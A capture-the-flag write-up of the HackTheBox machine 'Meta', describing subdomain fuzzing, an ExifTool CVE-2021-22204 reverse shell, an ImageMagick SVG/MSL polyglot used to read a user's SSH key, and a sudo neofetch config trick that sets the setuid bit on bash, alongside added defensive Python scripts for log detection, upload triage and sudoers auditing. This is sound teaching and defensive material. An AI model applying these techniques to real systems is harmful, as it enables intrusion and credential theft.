Meta
This is my fourth HTB box write-up on this blog, as well as my first medium-difficulty one.
Created by Nauten, Meta is CVE based, and that is how we get a foothold. Getting user was the hardest part, while root was pretty straightforward.
Reconnaissance
As usual, the first step in extracting information from a machine is an Nmap scan:
nmap -Pn -sC -sV 10.129.102.205
-Pn: treats the host as online, in case ICMP is blocked on the machine
-sC: runs the default Nmap scripts
-sV: detects the version of the services running on the open ports
We got two services running:
port 22: OpenSSH 7.9p1
port 80: HTTP Apache httpd
Let's check the web service running on port 80 with our web browser.
The IP (10.129.102.205) redirects to artcorp.htb; however, that hostname does not resolve, so we need to add an entry for it to the /etc/hosts file using nano.
Enumeration
The web page has no active links and no "robots.txt"; the only hint is a note about development in progress and a new product being launched, named "MetaView". There was no subdirectory with this name, and none at all for that matter, so why not check for a subdomain? For this, let's use the ffuf.me subdomain wordlist with the command below (ffuf's keyword is FUZZ, in upper case, and it is replaced by each wordlist entry):
ffuf -w subdomain.txt -u http://artcorp.htb/ -H "Host: FUZZ.artcorp.htb" -fw 1
-w: wordlist to fuzz with
-u: target URL
-H: Host header, which is where the keyword goes in order to fuzz subdomains
-fw: filter out responses with a word count of 1 (this removes from the output every guess that is not a real subdomain, since they all get the same short redirect response)
We got a subdomain, dev01. Add it to the /etc/hosts file, open the subdomain in the browser, and we get another web page: Artcorp Dev Environment.
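The Host-header fuzz above leaves a distinctive trace on the server side: one client IP sending many different Host values in a short time, nearly all of which receive the same default-vhost answer, with the one real name (dev01) standing out. The script below is an added example written for this write-up, not code from the box or from ffuf, that runs that detection over constructed Apache access-log lines. It assumes a custom LogFormat that appends the Host request header (the stock "combined" format does not log it), and the log lines, IPs and host names are all made up for the example.

```python
import re
from collections import Counter, defaultdict

# Regex for a custom Apache LogFormat that appends the Host request header:
#   LogFormat "%h %t \"%r\" %>s %b \"%{Host}i\"" vhost_audit
# Assumption: the stock "combined" format does not record the Host header, so a
# format like this one (or a proxy/WAF log that has it) is needed for this check.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<host>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_vhost_scanners(log_text, min_distinct_hosts=10):
    """Flag client IPs that present many distinct Host headers.

    For each flagged IP the report carries the dominant (status, bytes) pair,
    which during a fuzz is the default-vhost redirect that every wrong guess
    receives, and the 'outliers': host names that got a different answer and
    therefore probably exist (this mirrors what ffuf's -fw filter isolates).
    """
    hosts = defaultdict(dict)          # ip -> {host: (status, bytes)}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hosts[rec["ip"]][rec["host"].lower()] = (rec["status"], rec["bytes"])

    report = {}
    for ip, per_host in hosts.items():
        if len(per_host) < min_distinct_hosts:
            continue
        (dominant, _count), = Counter(per_host.values()).most_common(1)
        outliers = sorted(h for h, resp in per_host.items() if resp != dominant)
        report[ip] = {
            "distinct_hosts": len(per_host),
            "dominant": dominant,
            "outliers": outliers,
        }
    return report


# --- constructed sample log: one fuzzing client and one normal visitor -------
_GUESSES = ["admin", "api", "beta", "blog", "dev", "dev01",
            "mail", "shop", "stage", "test", "vpn", "www"]


def _line(ip, sec, host, status, nbytes):
    return (f'{ip} [05/Feb/2022:10:00:{sec:02d} +0000] "GET / HTTP/1.1" '
            f'{status} {nbytes} "{host}"')


SAMPLE_LOG = "\n".join(
    [_line("10.10.14.5", i, f"{w}.artcorp.htb",
           200 if w == "dev01" else 302, 1532 if w == "dev01" else 0)
     for i, w in enumerate(_GUESSES)]
    + [_line("10.10.14.9", 30, "artcorp.htb", 200, 5120),
       _line("10.10.14.9", 31, "artcorp.htb", 200, 48)]
)

if __name__ == "__main__":
    for ip, info in find_vhost_scanners(SAMPLE_LOG).items():
        print(ip, info)
```

Run against a real log, the threshold and the time window are the knobs to tune; a CDN or a shared-hosting front end legitimately sees many Host values per IP, so baseline it per environment before alerting.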
As we can see above, MetaView is an image upload page; all it does is display the metadata of the uploaded image. Its output looks like that of ExifTool, so there is a good chance ExifTool is running in the back-end and returning the image metadata.
After googling for an ExifTool exploit, I found CVE-2021-22204 with a working PoC on GitHub:
https://github.com/convisolabs/CVE-2021-22204-exiftool
After git cloning the repository, all we have to do is edit the exploit.py file and set the IP and port for the reverse shell. Running the exploit.py script, we get an image.jpg file, which is our payload. Now we set up a listener with netcat and upload the image.jpg file to the dev01.artcorp.htb/metaview page.
After the image.jpg upload, we get a shell as www-data. This is not a full user, so we have to escalate our privileges to user.
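From the defender's side, the upload page had two problems: the metadata tool was an unpatched ExifTool, and the upload was handed to it unfiltered. The following is an added example, not code from the write-up or from the PoC repository, showing the two checks an upload handler could apply. It assumes the vulnerable range from the public advisory for CVE-2021-22204 (ExifTool 7.44 up to and including 12.23, fixed in 12.24) and the fact that DjVu files open with the IFF signature "AT&TFORM"; because the public PoC for this bug smuggles a DjVu blob inside a JPEG that still has a valid JPEG header, a magic-byte check alone does not stop it, which is why the version check is the control that matters. The sample bytes are constructed and contain no payload.

```python
import re
import subprocess

# Vulnerable range for CVE-2021-22204 (assumption: taken from the public
# advisory, not from the write-up): 7.44 <= version < 12.24.
FIRST_VULNERABLE = (7, 44)
FIRST_FIXED = (12, 24)

# DjVu is an IFF container; its files start with this signature. The public
# PoC embeds a DjVu blob inside an otherwise valid JPEG, so the upload passes a
# JPEG magic-byte check; scanning the whole file for the signature is a cheap
# extra signal, not a replacement for patching.
DJVU_MAGIC = b"AT&TFORM"


def parse_version(text):
    """Turn '12.16' (or 'exiftool -ver' output) into a comparable (major, minor)."""
    m = re.search(r"(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return (int(m.group(1)), int(m.group(2)))


def exiftool_is_vulnerable(version_text):
    """True if the version lies inside the CVE-2021-22204 range."""
    return FIRST_VULNERABLE <= parse_version(version_text) < FIRST_FIXED


def installed_exiftool_version():
    """Ask the local exiftool for its version; None if it is not installed."""
    try:
        out = subprocess.run(["exiftool", "-ver"], capture_output=True,
                             text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        return None
    return out.strip()


def looks_like_jpeg(data):
    return data.startswith(b"\xff\xd8\xff")


def looks_like_png(data):
    return data.startswith(b"\x89PNG\r\n\x1a\n")


def embedded_djvu_offset(data):
    """Offset of a DjVu signature anywhere in the file, or -1 if absent."""
    return data.find(DJVU_MAGIC)


def triage_upload(data, exiftool_version_text):
    """Return a list of findings for one upload; an empty list means 'process it'."""
    findings = []
    if not (looks_like_jpeg(data) or looks_like_png(data)):
        findings.append("not-an-image")
        return findings                      # reject before any tool sees it
    if embedded_djvu_offset(data) >= 0:
        findings.append("embedded-djvu")     # polyglot indicator
    if exiftool_is_vulnerable(exiftool_version_text):
        findings.append("exiftool-vulnerable")
    return findings


# Constructed samples: a minimal JPEG-looking blob, and the same blob with the
# DjVu signature dropped into it. Neither is a working file or a payload.
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
POLYGLOT_SAMPLE = b"\xff\xd8\xff\xe1" + b"\x00" * 4 + DJVU_MAGIC + b"\x00" * 8 + b"\xff\xd9"

if __name__ == "__main__":
    ver = installed_exiftool_version() or "12.16"   # fall back to a sample value
    print("exiftool", ver, "vulnerable:", exiftool_is_vulnerable(ver))
    print("clean   :", triage_upload(CLEAN_JPEG, ver))
    print("polyglot:", triage_upload(POLYGLOT_SAMPLE, ver))
```

The version check is what closes the hole; the signature scan only catches the public PoC's layout, so treat "embedded-djvu" as a detection aid rather than a filter you rely on.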
Getting User
Pspy is a program that lets us spy on running processes without needing any special privileges; this will allow us to see what scripts or programs are running on the machine.
To upload it to the target machine, we use Python's built-in HTTP server on our machine and wget on the remote machine.
On our machine, while in the directory with Pspy, run:
python3 -m http.server
On the remote machine run:
wget http://yourIP:8000/filename
After uploading, use the command "chmod +x pspy" to make the file executable. Running pspy, we see an interesting script named convert_images.sh located in /usr/local/bin/.
Checking the script with the cat command: it cds to /var/www/dev01.artcorp.htb/convert_images, runs a program called mogrify, which converts any file in the directory to PNG format, then kills the process (mogrify) after the conversion. In order to make sense of this script we need to know what mogrify is:
We found a CVE for it too on Exploit-DB, but the payload used is found here, the SVG/MSL polyglot file.
We copy poc.svg to the machine the same way we did pspy; after that, we copy this file from the upload location to
/var/www/dev01.artcorp.htb/convert_images
PS: Don't transfer your file to this location directly, as it will be automatically deleted after a while, as seen in the pspy output.
As we can see below, the file gets executed and we get an output containing the value of $(id). Having confirmed that the exploit works, we use it to read user Thomas's private SSH key and print it to the file output2.
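The weak point in convert_images.sh is that it feeds every file in a directory the web server can write to into mogrify, so an XML polyglot with a .png or .svg name is processed like an image. The script below is an added example, not the box's script or ImageMagick code, showing the two fixes a maintainer would apply: classify files by their leading bytes before anything is converted, and confirm that the ImageMagick policy.xml disables the MSL and SVG coders. The allow-list, the sample file contents and the policy excerpt are all constructed for the example; the policy syntax follows ImageMagick's documented policymap format, and the matcher only handles a plain coder name or "*" as the pattern.

```python
import xml.etree.ElementTree as ET

# Leading-byte signatures of the raster formats the converter is meant to
# accept (constructed allow-list for this example).
MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def classify(data):
    """Return the allow-listed format name, or None for anything else.

    An SVG/MSL polyglot is XML text, so it begins with '<' or whitespace and
    is rejected here regardless of the extension it was given."""
    for name, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return name
    return None


def split_for_conversion(files):
    """files: dict of name -> bytes (what the convert_images directory holds).

    Returns (convert, quarantine): names whose content is an allowed raster
    format, and names that should be moved aside and logged instead of being
    passed to mogrify."""
    convert, quarantine = [], []
    for name, data in files.items():
        (convert if classify(data) else quarantine).append(name)
    return convert, quarantine


def coder_disabled(policy_xml, coder):
    """True if the policy map sets rights="none" for this coder (or for '*')."""
    root = ET.fromstring(policy_xml)
    if root.tag != "policymap":
        raise ValueError("not an ImageMagick policy map")
    for p in root.findall("policy"):
        if (p.get("domain") == "coder" and p.get("rights") == "none"
                and p.get("pattern", "").upper() in (coder.upper(), "*")):
            return True
    return False


# Constructed policy.xml excerpt; a real file carries more entries and a DOCTYPE.
POLICY_SAMPLE = """<policymap>
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="SVG" />
  <policy domain="coder" rights="none" pattern="TEXT" />
</policymap>
"""

# Constructed directory contents: a PNG-looking blob, a harmless SVG document,
# and the same SVG text renamed to .png to show that the extension is ignored.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
SVG_BYTES = b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"/>'
SAMPLE_DIR = {"a.png": PNG_BYTES, "poc.svg": SVG_BYTES, "x.png": SVG_BYTES}

if __name__ == "__main__":
    ok, bad = split_for_conversion(SAMPLE_DIR)
    print("convert   :", ok)
    print("quarantine:", bad)
    for c in ("MSL", "SVG", "PNG"):
        print(c, "disabled:", coder_disabled(POLICY_SAMPLE, c))
```

In the real script, only the "convert" list would be handed to mogrify, and the directory itself should not be writable by the web server account that serves uploads; the policy check belongs in the host's configuration audit, since policy.xml is what stops ImageMagick from interpreting MSL even when a file slips past the content check.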
Now that we have the SSH key, on our machine we have to do two things:
name the file "id_rsa"
change the file permissions to 600 (chmod 600 id_rsa) to make it private
After this, we connect via SSH as user thomas and grab the user.txt flag.
Root Privilege
Now, to escalate our privileges to root, we start with the most common enumeration step, "sudo -l". This shows all the commands the user is allowed to run with root privileges, and in this case we have a program named "neofetch". Neofetch is a simple program that displays system properties in a fancy way, nothing much, but it is our ticket to root.
Running neofetch, we can see that the config file is saved at ~/.config/neofetch/config.conf.
Using the lsattr command, we see that we can actually edit this file, so we can put our payload here. Since we can run this program as root, this will escalate our privileges.
As seen below, we edited the file config.conf to set the setuid bit, which allows thomas to run /bin/bash as root, since neofetch runs with root privileges.
XDG_CONFIG_HOME defines the base directory relative to which user-specific configuration files should be stored; we change it from the default under $HOME to point at the user's config file.
Finally, we run "/bin/bash -p" to gain root access. With the -p option, bash preserves the effective user ID it was launched with; without it, bash resets the effective UID to the real UID, in this case thomas. The -p option lets the setuid bit work properly, allowing bash to keep the user it is setuid to, which is root.
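The root step works because a root-run command reads a config file whose location is chosen by the invoking user. The audit below is an added example, not code from the write-up or from sudo, that parses a sudoers excerpt and flags the three conditions that make this pattern exploitable: env_keep passing through a config-steering variable such as XDG_CONFIG_HOME or HOME, env_reset being switched off, and NOPASSWD rules. The sudoers excerpt is constructed; the write-up only shows that thomas may run neofetch as root and that XDG_CONFIG_HOME is involved, so the exact rule and the env_keep line are assumptions made to reproduce that pattern.

```python
import re

# Variables that decide where a program looks for its configuration or code.
# If sudo lets any of them through, a command run as root can be pointed at a
# file the invoking user controls (constructed list; extend per environment).
CONFIG_STEERING = {
    "HOME", "XDG_CONFIG_HOME", "XDG_CONFIG_DIRS", "XDG_DATA_HOME",
    "PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH", "PERL5LIB",
}

ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*(?:"([^"]*)"|(\S+))')
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def _lines(text):
    """Yield non-empty sudoers lines with trailing comments removed."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line


def parse_env_keep(text):
    """Set of variable names added to env_keep by any Defaults line."""
    keep = set()
    for line in _lines(text):
        if not line.startswith("Defaults"):
            continue
        for m in ENV_KEEP_RE.finditer(line):
            keep.update((m.group(1) or m.group(2)).split())
    return keep


def env_reset_disabled(text):
    """True if some Defaults line turns env_reset off."""
    return any(line.startswith("Defaults") and re.search(r"!\s*env_reset\b", line)
               for line in _lines(text))


def parse_rules(text):
    """List of (user, runas, nopasswd, command) for each user specification."""
    rules = []
    for line in _lines(text):
        if line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m["user"], m["runas"] or "root",
                          "NOPASSWD:" in m["tags"], m["cmd"]))
    return rules


def audit_sudoers(text):
    """Return human-readable findings; an empty list means nothing flagged."""
    findings = []
    for var in sorted(parse_env_keep(text) & CONFIG_STEERING):
        findings.append(f"env_keep passes {var} through to commands run via sudo; "
                        f"a root-run program that locates its config from it can be "
                        f"steered to a user-writable file")
    if env_reset_disabled(text):
        findings.append("env_reset is disabled: the caller's whole environment "
                        "reaches commands run via sudo")
    for user, runas, nopasswd, cmd in parse_rules(text):
        if nopasswd:
            findings.append(f"NOPASSWD: {user} may run {cmd} as {runas} "
                            f"without authenticating")
    return findings


# Constructed sudoers excerpt reproducing the pattern implied by the write-up.
SUDOERS_SAMPLE = """\
Defaults        env_reset
Defaults        env_keep += "XDG_CONFIG_HOME"
thomas ALL=(root) NOPASSWD: /usr/bin/neofetch   # runs as root, reads user config
"""

if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS_SAMPLE):
        print("-", f)
```

The fix on the host side is to drop XDG_CONFIG_HOME (and HOME) from env_keep, so the root-run neofetch reads root's own config, and to avoid NOPASSWD rules for programs that read user-controlled files at all.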